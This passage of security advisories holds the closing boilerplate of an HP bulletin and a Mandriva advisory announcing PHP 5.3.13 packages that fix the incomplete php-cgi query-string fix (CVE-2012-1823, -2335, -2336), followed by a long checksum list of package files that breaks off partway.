(SMH) v7.2.1 or subsequent available for Windows and Linux to resolve the vulnerabilities. Information and updates for SMH can be found at the following location: http://h18013.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) - 18 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlHoGuMACgkQ4B86/C0qfVmlbwCg5muoKwOcRb0N/+BZa47f7lC9 CCoAoJo1hIDxLxljNZM2GDOcYGgJi1hH =kSG1 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2012:068-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php Date : May 10, 2012 Affected: 2010.1, 2011. _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in php(-cgi): PHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files. The updated packages have been patched to correct this issue. Update: It was discovered that the previous fix for the CVE-2012-1823 vulnerability was incomplete (CVE-2012-2335, CVE-2012-2336). The updated packages provides the latest version (5.3.13) which provides a solution to this flaw. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336 https://bugs.php.net/bug.php?id=61910 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ http://www.openwall.com/lists/oss-security/2012/05/09/9 _______________________________________________________________________ Updated Packages: Mandriva Linux 2010.1: 140d36ed5578274826846a0ff7ca05a9 2010.1/i586/apache-mod_php-5.3.13-0.1mdv2010.2.i586.rpm 24775050f82b736c2133fc30f93e809e 2010.1/i586/libphp5_common5-5.3.13-0.1mdv2010.2.i586.rpm f3fb19456fe4b8fd41f4306c007e85fb 2010.1/i586/php-bcmath-5.3.13-0.1mdv2010.2.i586.rpm 99a812ad5970bc37414909de5ef578fa 2010.1/i586/php-bz2-5.3.13-0.1mdv2010.2.i586.rpm 634f717747ee4db7cdd19a93ffd2d5ef 2010.1/i586/php-calendar-5.3.13-0.1mdv2010.2.i586.rpm 3429fa2b956f67b8602489e4b7d3757a 2010.1/i586/php-cgi-5.3.13-0.1mdv2010.2.i586.rpm 51a1d975e31b445ef71901cd04d8fd3a 2010.1/i586/php-cli-5.3.13-0.1mdv2010.2.i586.rpm ba763fffd3798434cb0cde5c8f7a8891 2010.1/i586/php-ctype-5.3.13-0.1mdv2010.2.i586.rpm ebf996e845619b26515e6f3e828c8fbf 2010.1/i586/php-curl-5.3.13-0.1mdv2010.2.i586.rpm ec57b30c43f5678b8cd822fd85df5e34 2010.1/i586/php-dba-5.3.13-0.1mdv2010.2.i586.rpm 85799e72a9511c0f54ff2435fba0aaab 2010.1/i586/php-devel-5.3.13-0.1mdv2010.2.i586.rpm 823c9544385c894e4c5edd1b52bf4e92 2010.1/i586/php-doc-5.3.13-0.1mdv2010.2.i586.rpm 5d753655d5615e92db188468903b8d16 2010.1/i586/php-dom-5.3.13-0.1mdv2010.2.i586.rpm 705fbff48501d08bae719a2d7841d8c2 2010.1/i586/php-enchant-5.3.13-0.1mdv2010.2.i586.rpm 4f78075bddc8fa173a7384e545e3cd5c 2010.1/i586/php-exif-5.3.13-0.1mdv2010.2.i586.rpm e8fefd604fd5006361419135c9059076 2010.1/i586/php-fileinfo-5.3.13-0.1mdv2010.2.i586.rpm bc65e927149d5277ad634b0bad8a868a 2010.1/i586/php-filter-5.3.13-0.1mdv2010.2.i586.rpm ea6a6fd721db888225dfea83a0ad99d9 2010.1/i586/php-fpm-5.3.13-0.1mdv2010.2.i586.rpm 7fb6a2914e72a63ec9401c9662f9bc2b 2010.1/i586/php-ftp-5.3.13-0.1mdv2010.2.i586.rpm 0df19020817d838aba51f052c29f6532 2010.1/i586/php-gd-5.3.13-0.1mdv2010.2.i586.rpm 5ce28c873da3fc5e0feda8e3cad2247a 2010.1/i586/php-gettext-5.3.13-0.1mdv2010.2.i586.rpm acbe524bfc8e156906c70124496a3161 2010.1/i586/php-gmp-5.3.13-0.1mdv2010.2.i586.rpm d03bc0f91411297408ac3dbbd5c426b3 2010.1/i586/php-hash-5.3.13-0.1mdv2010.2.i586.rpm 19bc92bd8b1a4ea4b86b497f5f48933c 2010.1/i586/php-iconv-5.3.13-0.1mdv2010.2.i586.rpm a891fe8d9bcbbfc4458fb31a23720338 2010.1/i586/php-imap-5.3.13-0.1mdv2010.2.i586.rpm edec73af34ecb6b42ed0a14dadb8949d 2010.1/i586/php-ini-5.3.13-0.1mdv2010.2.i586.rpm 529135563f982966be228d0e7055a97d 2010.1/i586/php-intl-5.3.13-0.1mdv2010.2.i586.rpm 2de32f3e7d7da5e06a83f9bf8eac6318 2010.1/i586/php-json-5.3.13-0.1mdv2010.2.i586.rpm 2b4f232c6bd026de886d8199dba4c2f2 2010.1/i586/php-ldap-5.3.13-0.1mdv2010.2.i586.rpm c14fe2ed7cfeb5320fed29676af9e682 2010.1/i586/php-mbstring-5.3.13-0.1mdv2010.2.i586.rpm 606e65e002f946dcf9fa8f7f3950f81d 2010.1/i586/php-mcrypt-5.3.13-0.1mdv2010.2.i586.rpm 84e35a42b7861251869a439b0031f225 2010.1/i586/php-mssql-5.3.13-0.1mdv2010.2.i586.rpm 95caf9f4d272fdeae006851e482a2461 2010.1/i586/php-mysql-5.3.13-0.1mdv2010.2.i586.rpm 5bb6f61f906e8572f66cbbcb0a3a667b 2010.1/i586/php-mysqli-5.3.13-0.1mdv2010.2.i586.rpm 28e5bdd198862a80dfea2ab9e86b9678 2010.1/i586/php-mysqlnd-5.3.13-0.1mdv2010.2.i586.rpm 802e12a27b7256dbba5b9029e7bbb00b 2010.1/i586/php-odbc-5.3.13-0.1mdv2010.2.i586.rpm f3f2b22190a0180e4adddd36ac43b808 2010.1/i586/php-openssl-5.3.13-0.1mdv2010.2.i586.rpm 850ed2a02899e7ef950368f1e6936e7b 2010.1/i586/php-pcntl-5.3.13-0.1mdv2010.2.i586.rpm 128bc6c67ee8960e29c893a0a210f967 2010.1/i586/php-pdo-5.3.13-0.1mdv2010.2.i586.rpm 31d3d8d11a8ec860ff748b4491ed637d 2010.1/i586/php-pdo_dblib-5.3.13-0.1mdv2010.2.i586.rpm 840fd711e567a690f46a5aa686a47019 2010.1/i586/php-pdo_mysql-5.3.13-0.1mdv2010.2.i586.rpm 6b979eef99f357fc4e283c98c5ef96ea 2010.1/i586/php-pdo_odbc-5.3.13-0.1mdv2010.2.i586.rpm 9b5d0ca325bbfcf6b87f74748caceb76 2010.1/i586/php-pdo_pgsql-5.3.13-0.1mdv2010.2.i586.rpm 70c688be75e34b79a9a35462570a2ada 2010.1/i586/php-pdo_sqlite-5.3.13-0.1mdv2010.2.i586.rpm e67f4f8ded56378452b8a548b126266b 2010.1/i586/php-pgsql-5.3.13-0.1mdv2010.2.i586.rpm 4d26258bb774b1d9aff74d3fdc1e3c2c 2010.1/i586/php-phar-5.3.13-0.1mdv2010.2.i586.rpm 74bc08429969529762425997772f8a5d 2010.1/i586/php-posix-5.3.13-0.1mdv2010.2.i586.rpm e697d56093f50bbde693541d67b7566c 2010.1/i586/php-pspell-5.3.13-0.1mdv2010.2.i586.rpm 0fc94be46e664a52fbc9111958cd4146 2010.1/i586/php-readline-5.3.13-0.1mdv2010.2.i586.rpm af7e1bb5a2722063cc52af223dc90787 2010.1/i586/php-recode-5.3.13-0.1mdv2010.2.i586.rpm fee14325fb3a764988c4e2a69c7938b4 2010.1/i586/php-session-5.3.13-0.1mdv2010.2.i586.rpm e89aba4b7dec345be125261046d31b92 2010.1/i586/php-shmop-5.3.13-0.1mdv2010.2.i586.rpm 69f2a66fef9892c0405d3a03c72096b2 2010.1/i586/php-snmp-5.3.13-0.1mdv2010.2.i586.rpm 4db2b4b3d7670603b5922a122dc975aa 2010.1/i586/php-soap-5.3.13-0.1mdv2010.2.i586.rpm e02779584cc1c588d75346f6995ad5a6 2010.1/i586/php-sockets-5.3.13-0.1mdv2010.2.i586.rpm aae3b1c32441f481c49f7f38c1c96294 2010.1/i586/php-sqlite3-5.3.13-0.1mdv2010.2.i586.rpm b4255e1825f289410b71b6a210229b8e 2010.1/i586/php-sqlite-5.3.13-0.1mdv2010.2.i586.rpm dd54ede221fd579f1ebd81be6930010b 2010.1/i586/php-sybase_ct-5.3.13-0.1mdv2010.2.i586.rpm 4bdebc41d1b654e904d39c8f89be51a2 2010.1/i586/php-sysvmsg-5.3.13-0.1mdv2010.2.i586.rpm 3d485895eca51f5f801323baf1f0f8bf 2010.1/i586/php-sysvsem-5.3.13-0.1mdv2010.2.i586.rpm a5c65e02a46da5f9a1be3235565926a3 2010.1/i586/php-sysvshm-5.3.13-0.1mdv2010.2.i586.rpm 1a1e6a0a91388e7113f2774bb0f16c01 2010.1/i586/php-tidy-5.3.13-0.1mdv2010.2.i586.rpm cf565e35c341273ed2b4378c9f0980c8 2010.1/i586/php-tokenizer-5.3.13-0.1mdv2010.2.i586.rpm b1fd12591b6500464a97eb2ae47b2f60 2010.1/i586/php-wddx-5.3.13-0.1mdv2010.2.i586.rpm f0f801ce893ad8eb55bb21d010af641a 2010.1/i586/php-xml-5.3.13-0.1mdv2010.2.i586.rpm 055873d10551544750bd05555cc63155 2010.1/i586/php-xmlreader-5.3.13-0.1mdv2010.2.i586.rpm 69a6e3930ed1b2d1ddac5df5719bc6d6 2010.1/i586/php-xmlrpc-5.3.13-0.1mdv2010.2.i586.rpm de7f360c56f74b036ea924d9f7c76b59 2010.1/i586/php-xmlwriter-5.3.13-0.1mdv2010.2.i586.rpm 4cbd130cf269dd2769dd084322eaf77a 2010.1/i586/php-xsl-5.3.13-0.1mdv2010.2.i586.rpm 1d32b52e968a2bd7c4ff6b640f38ae36 2010.1/i586/php-zip-5.3.13-0.1mdv2010.2.i586.rpm 9508241b048c6acc033c16494f797289 2010.1/i586/php-zlib-5.3.13-0.1mdv2010.2.i586.rpm cd0e0682df60061148366ab6b10394d2 2010.1/SRPMS/apache-mod_php-5.3.13-0.1mdv2010.2.src.rpm f454d177e9bd631df2a4eeca3d33fe38 2010.1/SRPMS/php-5.3.13-0.1mdv2010.2.src.rpm 281be8fe2bb8cd404ade445f64c616da 2010.1/SRPMS/php-ini-5.3.13-0.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 5c32f90215090901240e661f8e2224a9 2010.1/x86_64/apache-mod_php-5.3.13-0.1mdv2010.2.x86_64.rpm c21032781b826fe3a8202eff5b7ef8b5 2010.1/x86_64/lib64php5_common5-5.3.13-0.1mdv2010.2.x86_64.rpm a2d0b2b43aa856d5872679d455e56a1e 2010.1/x86_64/php-bcmath-5.3.13-0.1mdv2010.2.x86_64.rpm 5421084c1b946cb2c5eeebfed07ac829 2010.1/x86_64/php-bz2-5.3.13-0.1mdv2010.2.x86_64.rpm 48aa03dcba36a09689dc6c7f2497741c 2010.1/x86_64/php-calendar-5.3.13-0.1mdv2010.2.x86_64.rpm c503b930c9d60cbd4d4ea58d8a6deda7 2010.1/x86_64/php-cgi-5.3.13-0.1mdv2010.2.x86_64.rpm 228b72cbf197c817d866d1fe3c7ed6b2 2010.1/x86_64/php-cli-5.3.13-0.1mdv2010.2.x86_64.rpm c9435be90a6e5fae1a980109c9bc9aca 2010.1/x86_64/php-ctype-5.3.13-0.1mdv2010.2.x86_64.rpm 0eb2e95722b4af3006f560c8441d687f 2010.1/x86_64/php-curl-5.3.13-0.1mdv2010.2.x86_64.rpm ccebc661c63d1028540c1212de90bbae 2010.1/x86_64/php-dba-5.3.13-0.1mdv2010.2.x86_64.rpm 2edc5f5c47a0ee2bbf001fae9024849f 2010.1/x86_64/php-devel-5.3.13-0.1mdv2010.2.x86_64.rpm 3b3eeb211bf45ede0abaae347d8bc745 2010.1/x86_64/php-doc-5.3.13-0.1mdv2010.2.x86_64.rpm 29f9a4fcee784caeaa54d88ae6f1fda9 2010.1/x86_64/php-dom-5.3.13-0.1mdv2010.2.x86_64.rpm eda0d150731e178912024b0ff6665835 2010.1/x86_64/php-enchant-5.3.13-0.1mdv2010.2.x86_64.rpm cf52bd1d68b75ba6841fe6258b9a1f69 2010.1/x86_64/php-exif-5.3.13-0.1mdv2010.2.x86_64.rpm 0243226aa4bf036a4054b48966f80cf3 2010.1/x86_64/php-fileinfo-5.3.13-0.1mdv2010.2.x86_64.rpm a5bca21277b5c72133340ea059cf0df0 2010.1/x86_64/php-filter-5.3.13-0.1mdv2010.2.x86_64.rpm 3c7007006b1d93d8c96e86dcf27ea38b 2010.1/x86_64/php-fpm-5.3.13-0.1mdv2010.2.x86_64.rpm f9549d4ed2973e5c1519546e971fd81a 2010.1/x86_64/php-ftp-5.3.13-0.1mdv2010.2.x86_64.rpm c7231a7117abab68e8c4d1a3f6a80ccb 2010.1/x86_64/php-gd-5.3.13-0.1mdv2010.2.x86_64.rpm 0ca2c9679c082508a4c2b007ec5a8c46 2010.1/x86_64/php-gettext-5.3.13-0.1mdv2010.2.x86_64.rpm 7d0de98a757251e874aff11ab76db12b 2010.1/x86_64/php-gmp-5.3.13-0.1mdv2010.2.x86_64.rpm 8757a89019988ab9b689c282ae06cf01 2010.1/x86_64/php-hash-5.3.13-0.1mdv2010.2.x86_64.rpm 996f5bcb88fc855db3cc4c779897a9ad 2010.1/x86_64/php-iconv-5.3.13-0.1mdv2010.2.x86_64.rpm 1580fd0ebb4ff0bd0e3c2a6e8925fc8a 2010.1/x86_64/php-imap-5.3.13-0.1mdv2010.2.x86_64.rpm 89a3915683d63a757fa29e53fadf0e1d 2010.1/x86_64/php-ini-5.3.13-0.1mdv2010.2.x86_64.rpm 38115fadfb51fdfd10ea14def4d9143d 2010.1/x86_64/php-intl-5.3.13-0.1mdv2010.2.x86_64.rpm 06aaaa6c43d85283ba31e079f9e1e0e0 2010.1/x86_64/php-json-5.3.13-0.1mdv2010.2.x86_64.rpm b9f6e00a0ac3916b91442ed6c62ad440 2010.1/x86_64/php-ldap-5.3.13-0.1mdv2010.2.x86_64.rpm 9b634f67d80ba028247dafe559276859 2010.1/x86_64/php-mbstring-5.3.13-0.1mdv2010.2.x86_64.rpm bd39ac4808035578dec2e24a98457b03 2010.1/x86_64/php-mcrypt-5.3.13-0.1mdv2010.2.x86_64.rpm 4acc008044469403769de09af155f0d5 2010.1/x86_64/php-mssql-5.3.13-0.1mdv2010.2.x86_64.rpm 8d5826fa6ba3dcaf214839a654e74659 2010.1/x86_64/php-mysql-5.3.13-0.1mdv2010.2.x86_64.rpm ea0e352e2900b493b9d355257ec99a4e 2010.1/x86_64/php-mysqli-5.3.13-0.1mdv2010.2.x86_64.rpm 40b23996dd377b3699ca230f30451e09 2010.1/x86_64/php-mysqlnd-5.3.13-0.1mdv2010.2.x86_64.rpm 4a49bad04937598951093dbf1e57eb19 2010.1/x86_64/php-odbc-5.3.13-0.1mdv2010.2.x86_64.rpm ef337452c999c609f38511b30424aa95 2010.1/x86_64/php-openssl-5.3.13-0.1mdv2010.2.x86_64.rpm 8adda9b3ac67749c4cbbca498fe97042 2010.1/x86_64/php-pcntl-5.3.13-0.1mdv2010.2.x86_64.rpm aab08edd87702937cc87e3eea9683e04 2010.1/x86_64/php-pdo-5.3.13-0.1mdv2010.2.x86_64.rpm b769d4729112be42057acbecc42784fd 2010.1/x86_64/php-pdo_dblib-5.3.13-0.1mdv2010.2.x86_64.rpm 51f45520e81ae006da36c27e9ff23d29 2010.1/x86_64/php-pdo_mysql-5.3.13-0.1mdv2010.2.x86_64.rpm 337fef4ac991f694fbc52f1b51292f0e 2010.1/x86_64/php-pdo_odbc-5.3.13-0.1mdv2010.2.x86_64.rpm ee046601f134c275c1c5394156868176 2010.1/x86_64/php-pdo_pgsql-5.3.13-0.1mdv2010.2.x86_64.rpm f1b25be0d7a2e6948dd6d95776da6f27 2010.1/x86_64/php-pdo_sqlite-5.3.13-0.1mdv2010.2.x86_64.rpm c61a1bc81075ebfc94e820984597774b 2010.1/x86_64/php-pgsql-5.3.13-0.1mdv2010.2.x86_64.rpm 11bed7992443f01305ad4ce8304e9f07 2010.1/x86_64/php-phar-5.3.13-0.1mdv2010.2.x86_64.rpm dd6008750a431325112944e3a5783d0c 2010.1/x86_64/php-posix-5.3.13-0.1mdv2010.2.x86_64.rpm f5531db71580b0c17c5796cfd79f4020 2010.1/x86_64/php-pspell-5.3.13-0.1mdv2010.2.x86_64.rpm 80c9841836ea5246babb676ce79adb9d 2010.1/x86_64/php-readline-5.3.13-0.1mdv2010.2.x86_64.rpm 6271ebd8132c7d94513646d0bbfedf15 2010.1/x86_64/php-recode-5.3.13-0.1mdv2010.2.x86_64.rpm 77e395b19c6068c941cc1ee1c89e15c6 2010.1/x86_64/php-session-5.3.13-0.1mdv2010.2.x86_64.rpm b310511e16b059f753cef3fbe39a35b0 2010.1/x86_64/php-shmop-5.3.13-0.1mdv2010.2.x86_64.rpm 70b99d0120ea8c6018a327996314ab49 2010.1/x86_64/php-snmp-5.3.13-0.1mdv2010.2.x86_64.rpm 33f829a30afaeab74203389d8a48a2d9 2010.1/x86_64/php-soap-5.3.13-0.1mdv2010.2.x86_64.rpm 64295e56e1c81c3322aa49bd1bf2d838 2010.1/x86_64/php-sockets-5.3.13-0.1mdv2010.2.x86_64.rpm 9afd6ba7da1e9ffa58a33c822eeb6a9d 2010.1/x86_64/php-sqlite3-5.3.13-0.1mdv2010.2.x86_64.rpm 8f8e7ee68199f5fdb8867b10d8cede5a 2010.1/x86_64/php-sqlite-5.3.13-0.1mdv2010.2.x86_64.rpm 84d824d25bcd058301b8a8cac4eece97 2010.1/x86_64/php-sybase_ct-5.3.13-0.1mdv2010.2.x86_64.rpm cdd27855aa2b685fba70fea949d0f8f5 2010.1/x86_64/php-sysvmsg-5.3.13-0.1mdv2010.2.x86_64.rpm 47714ed1a09513b0fa4016fed1faf374 2010.1/x86_64/php-sysvsem-5.3.13-0.1mdv2010.2.x86_64.rpm 878cc21a21bcb9120f0c60d0dc3c848d 2010.1/x86_64/php-sysvshm-5.3.13-0.1mdv2010.2.x86_64.rpm ed7017d81df4e68da01f9d790c5e9e75 2010.1/x86_64/php-tidy-5.3.13-0.1mdv2010.2.x86_64.rpm e2dbcbefd496f408e56c5072938f62d6 2010.1/x86_64/php-tokenizer-5.3.13-0.1mdv2010.2.x86_64.rpm c629479463912ae1d91c4399e5b05f67 2010.1/x86_64/php-wddx-5.3.13-0.1mdv2010.2.x86_64.rpm 5a71b4a2a66aa994585f3372f13ad969 2010.1/x86_64/php-xml-5.3.13-0.1mdv2010.2.x86_64.rpm 9e99f81386d263bf395a4462ce3333f8 2010.1/x86_64/php-xmlreader-5.3.13-0.1mdv2010.2.x86_64.rpm 76c565d3fdcba0133b6c25a914a4fed3 2010.1/x86_64/php-xmlrpc-5.3.13-0.1mdv2010.2.x86_64.rpm af3b32c6d60342fb5c7a7c455f647f34 2010.1/x86_64/php-xmlwriter-5.3.13-0.1mdv2010.2.x86_64.rpm 31a1efcba8488b85ec31054bea181262 2010.1/x86_64/php-xsl-5.3.13-0.1mdv2010.2.x86_64.rpm d3b08c3d48baefa3ee14632b876100fb 2010.1/x86_64/php-zip-5.3.13-0.1mdv2010.2.x86_64.rpm a6a3b117484b1bb2e7d449c08fa49b46 2010.1/x86_64/php-zlib-5.3.13-0.1mdv2010.2.x86_64.rpm cd0e0682df60061148366ab6b10394d2 2010.1/SRPMS/apache-mod_php-5.3.13-0.1mdv2010.2.src.rpm f454d177e9bd631df2a4eeca3d33fe38 2010.1/SRPMS/php-5.3.13-0.1mdv2010.2.src.rpm 281be8fe2bb8cd404ade445f64c616da 2010.1/SRPMS/php-ini-5.3.13-0.1mdv2010.2.src.rpm Mandriva Linux 2011: 35cdd956ce62db7548d2626d8a8f7ae8 2011/i586/apache-mod_php-5.3.13-0.1-mdv2011.0.i586.rpm dd02a276ddca3ae7ad754e19a41e8ff8 2011/i586/libphp5_common5-5.3.13-0.1-mdv2011.0.i586.rpm 7a8feff11aa910f94074c57b54a124d6 2011/i586/php-bcmath-5.3.13-0.1-mdv2011.0.i586.rpm 3c70edc391c1c8fb7845f81f3b3f5bac 2011/i586/php-bz2-5.3.13-0.1-mdv2011.0.i586.rpm d8020203023aaf02a30b22559d5a67c7 2011/i586/php-calendar-5.3.13-0.1-mdv2011.0.i586.rpm e0f010a7d61cf27e13a486ff6e5d6ce4 2011/i586/php-cgi-5.3.13-0.1-mdv2011.0.i586.rpm 345ee6e60bc1973f0049ab25f7dc3557 2011/i586/php-cli-5.3.13-0.1-mdv2011.0.i586.rpm c4e851c0260ad96797ca56deb2b6f3c7 2011/i586/php-ctype-5.3.13-0.1-mdv2011.0.i586.rpm 073d81d6531862861015cf7f53173045 2011/i586/php-curl-5.3.13-0.1-mdv2011.0.i586.rpm 1330fd10a3bdd3787913db7795054819 2011/i586/php-dba-5.3.13-0.1-mdv2011.0.i586.rpm b6d0fefa9206b7cd3f4c73744c324906 2011/i586/php-devel-5.3.13-0.1-mdv2011.0.i586.rpm 32a9567d7a61d6f35654e8d33baec58a 2011/i586/php-doc-5.3.13-0.1-mdv2011.0.i586.rpm 149566d373265e732f1ec3140d11cac2 2011/i586/php-dom-5.3.13-0.1-mdv2011.0.i586.rpm 6f4b1fe24a35809c93e9489347c448bb 2011/i586/php-enchant-5.3.13-0.1-mdv2011.0.i586.rpm 44f27021f7ff8202f5f34a8b0720be5b 2011/i586/php-exif-5.3.13-0.1-mdv2011.0.i586.rpm 5d32e3e7dc217fd69b6dc99dffb747f7 2011/i586/php-fileinfo-5.3.13-0.1-mdv2011.0.i586.rpm 043c17fad24c3113600799c63c5dde18 2011/i586/php-filter-5.3.13-0.1-mdv2011.0.i586.rpm 08c16e8ec2f1c821df8090c38c43809b 2011/i586/php-fpm-5.3.13-0.1-mdv2011.0.i586.rpm 209b4baf966b45cb48790e7a020b1aa9 2011/i586/php-ftp-5.3.13-0.1-mdv2011.0.i586.rpm eac85767ff89fcf822b2c2cf408b2aca 2011/i586/php-gd-5.3.13-0.1-mdv2011.0.i586.rpm 7c7c5ab6370c934b727dac2ad1c9bd33 2011/i586/php-gettext-5.3.13-0.1-mdv2011.0.i586.rpm babb1410dd897504ec526243789fd749 2011/i586/php-gmp-5.3.13-0.1-mdv2011.0.i586.rpm 63feb83eda18663f3ae28fee522a79c8 2011/i586/php-hash-5.3.13-0.1-mdv2011.0.i586.rpm a8aad04e3c20f9223832632f412c4c69 2011/i586/php-iconv-5.3.13-0.1-mdv2011.0.i586.rpm 22f5f2b807af8ea7445e8682f6718ab2 2011/i586/php-imap-5.3.13-0.1-mdv2011.0.i586.rpm ff780d80135cc18647edecdde6b77e16 2011/i586/php-ini-5.3.13-0.1-mdv2011.0.i586.rpm 10475ddafeeb384ae3afb7f5d2d1afa8 2011/i586/php-intl-5.3.13-0.1-mdv2011.0.i586.rpm e3261da452695aed46718ec06a1f17ed 2011/i586/php-json-5.3.13-0.1-mdv2011.0.i586.rpm f6238f4f4566582418666333eb797994 2011/i586/php-ldap-5.3.13-0.1-mdv2011.0.i586.rpm 9ae1d9fc8320fa272fa56484f425e7d8 2011/i586/php-mbstring-5.3.13-0.1-mdv2011.0.i586.rpm 86710277f0bca955ced6610b199fcf16 2011/i586/php-mcrypt-5.3.13-0.1-mdv2011.0.i586.rpm a9dad85e7658b897bcd9a3c088a71168 2011/i586/php-mssql-5.3.13-0.1-mdv2011.0.i586.rpm 66063a764c3a2b90143c5653c0f1dd2c 2011/i586/php-mysql-5.3.13-0.1-mdv2011.0.i586.rpm c7993bdf0b9ceaf4f2fa86dbc558ddfb 2011/i586/php-mysqli-5.3.13-0.1-mdv2011.0.i586.rpm afcd3e1e62498bffaa9432c5d5c505f5 2011/i586/php-mysqlnd-5.3.13-0.1-mdv2011.0.i586.rpm 21a837c5413d3e89b7747b70b343ff39 2011/i586/php-odbc-5.3.13-0.1-mdv2011.0.i586.rpm 9653980157e82a7cc1fcb428e6a11831 2011/i586/php-openssl-5.3.13-0.1-mdv2011.0.i586.rpm 2a7283323df15b449a0911147e4e120a 2011/i586/php-pcntl-5.3.13-0.1-mdv2011.0.i586.rpm 5943398e22f4b3aab9fb741e7b6a8014 2011/i586/php-pdo-5.3.13-0.1-mdv2011.0.i586.rpm 4a8632f0605a849c61148479c3dce11c 2011/i586/php-pdo_dblib-5.3.13-0.1-mdv2011.0.i586.rpm 90bfc85fce2cf88d5cc7e9d383bac674 2011/i586/php-pdo_mysql-5.3.13-0.1-mdv2011.0.i586.rpm 13a2e35fe9389ceff1bd86915d4fbb45 2011/i586/php-pdo_odbc-5.3.13-0.1-mdv2011.0.i586.rpm bd5ac6d3de510f5648e0796262ee0284 2011/i586/php-pdo_pgsql-5.3.13-0.1-mdv2011.0.i586.rpm c8a144f194b2e263d30d42549ef72df7 2011/i586/php-pdo_sqlite-5.3.13-0.1-mdv2011.0.i586.rpm 9fc72c845adc2c8b526ccda1045e95cb 2011/i586/php-pgsql-5.3.13-0.1-mdv2011.0.i586.rpm ceed9de56ba7babbb1103c0505360ae8 2011/i586/php-phar-5.3.13-0.1-mdv2011.0.i586.rpm 99df22a88e7ec65277c5f1d67946b674 2011/i586/php-posix-5.3.13-0.1-mdv2011.0.i586.rpm 2a7c90e39eaed912fd8ef49d5edcf3b0 2011/i586/php-pspell-5.3.13-0.1-mdv2011.0.i586.rpm b4f54f67b9372e1bef78b6a40a756d31 2011/i586/php-readline-5.3.13-0.1-mdv2011.0.i586.rpm c3ab166b9fc83521a75c13dff80f3a56 2011/i586/php-recode-5.3.13-0.1-mdv2011.0.i586.rpm a6c67fe24586ad45656a0e11906e7bb3 2011/i586/php-session-5.3.13-0.1-mdv2011.0.i586.rpm 39dd1f3c8218f0537aad8f03aa96b833 2011/i586/php-shmop-5.3.13-0.1-mdv2011.0.i586.rpm 7d516b28e8f45f06883657d93d152c31 2011/i586/php-snmp-5.3.13-0.1-mdv2011.0.i586.rpm 511c2eadd6584227584704adf97150e9 2011/i586/php-soap-5.3.13-0.1-mdv2011.0.i586.rpm d2bb4858eb41257b9e3c72b385b55fed 2011/i586/php-sockets-5.3.13-0.1-mdv2011.0.i586.rpm ef20af5ac9def94fc4db18e4e9ef80f3 2011/i586/php-sqlite3-5.3.13-0.1-mdv2011.0.i586.rpm d87d2f151f37050dd9f3d1fb66cc5be6 2011/i586/php-sqlite-5.3.13-0.1-mdv2011.0.i586.rpm 1214cb4bc37c7fb285dd6c2f00411904 2011/i586/php-sybase_ct-5.3.13-0.1-mdv2011.0.i586.rpm 1bd2a3a7f3408e7e304190e4145cec7f 2011/i586/php-sysvmsg-5.3.13-0.1-mdv2011.0.i586.rpm 602e9fbc2dd26d526709da1fbb5f43a3 2011/i586/php-sysvsem-5.3.13-0.1-mdv2011.0.i586.rpm 1f4d61a55c51175890bf3fe8da58178b 2011/i586/php-sysvshm-5.3.13-0.1-mdv2011.0.i586.rpm 7f81e3126928fd1e48e61a04e978e549 2011/i586/php-tidy-5.3.13-0.1-mdv2011.0.i586.rpm a2ea94863a07932b8cc8adfaf9984801 2011/i586/php-tokenizer-5.3.13-0.1-mdv2011.0.i586.rpm 7ca9553c6d0280546bc198cf7e349fd0 2011/i586/php-wddx-5.3.13-0.1-mdv2011.0.i586.rpm 2657cd50ab3d1ed89c40dd022b18a78a 2011/i586/php-xml-5.3.13-0.1-mdv2011.0.i586.rpm 4484a28aa070a5507ca51b7b6ccd9c4f 2011/i586/php-xmlreader-5.3.13-0.1-mdv2011.0.i586.rpm fb655f70ba8fd02cb283c685fb32198d 2011/i586/php-xmlrpc-5.3.13-0.1-mdv2011.0.i586.rpm 595eb1d07062b9ea1cbfa4db0c858b24 2011/i586/php-xmlwriter-5.3.13-0.1-mdv2011.0.i586.rpm 13c04bf3f0134e29372d595589f59193 2011/i586/php-xsl-5.3.13-0.1-mdv2011.0.i586.rpm 0a98ea3d088772271f96eeb7a5f23ba2 2011/i586/php-zip-5.3.13-0.1-mdv2011.0.i586.rpm e5242f7e29696cf3f9a80eb65ac97184 2011/i586/php-zlib-5.3.13-0.1-mdv2011.0.i586.rpm 43577b68968398f3e83bbb150c2ba4dd 2011/SRPMS/apache-mod_php-5.3.13-0.1.src.rpm 